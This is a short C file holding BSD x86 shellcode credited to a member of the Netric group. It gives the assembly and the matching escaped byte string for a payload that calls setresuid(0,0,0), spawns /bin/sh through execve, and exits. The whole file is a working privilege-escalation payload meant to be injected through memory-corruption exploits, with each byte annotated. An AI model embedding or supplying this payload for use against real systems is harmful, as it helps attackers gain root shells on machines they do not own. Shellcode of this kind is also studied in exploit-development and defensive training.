/* BSD x86 shellcode(50 bytes) by sacrine of Netric (www.netric.org) * setresuid(0,0,0); execve /bin/sh; exit; */ int main() { __asm(" xorl %eax,%eax pushl %eax pushl %eax pushl %eax pushl %eax movw $0x137, %ax int $0x80 xorl %eax,%eax pushl %eax pushl $0x68732f2f pushl $0x6e69622f mov %esp,%ebx pushl %eax pushl %esp pushl %ebx pushl %eax movb $0x3b,%al int $0x80 xorl %eax,%eax movb $0x1,%al int $0x80 "); } */ char main[]= // setresuid(0,0,0); "\x55\x89\xe5\x31\xc0" // xorl %eax,%eax "\x50" // pushl %eax "\x50" // pushl %eax "\x50" // pushl %eax "\x50" // pushl %eax "\x66\xb8\x37\x01" // movw $0x137, %ax (setresuid();) "\xcd\x80" // int $0x80 // execve /bin/sh "\x31\xc0" // xorl %eax,%eax "\x50" // pushl %eax "\x68\x2f\x2f\x73\x68" // pushl $0x68732f2f "\x68\x2f\x62\x69\x6e" // pushl $0x6e69622f "\x89\xe3" // mov %esp,%ebx "\x50" // pushl %eax "\x54" // pushl %esp "\x53" // pushl %ebx "\x50" // pushl %eax "\xb0\x3b" // movb $0x3b,%al "\xcd\x80" // int $0x80 // exit(); "\x31\xc0" // xorl %eax,%eax "\xb0\x01" // movb $0x1,%al "\xcd\x80"; // int $0x80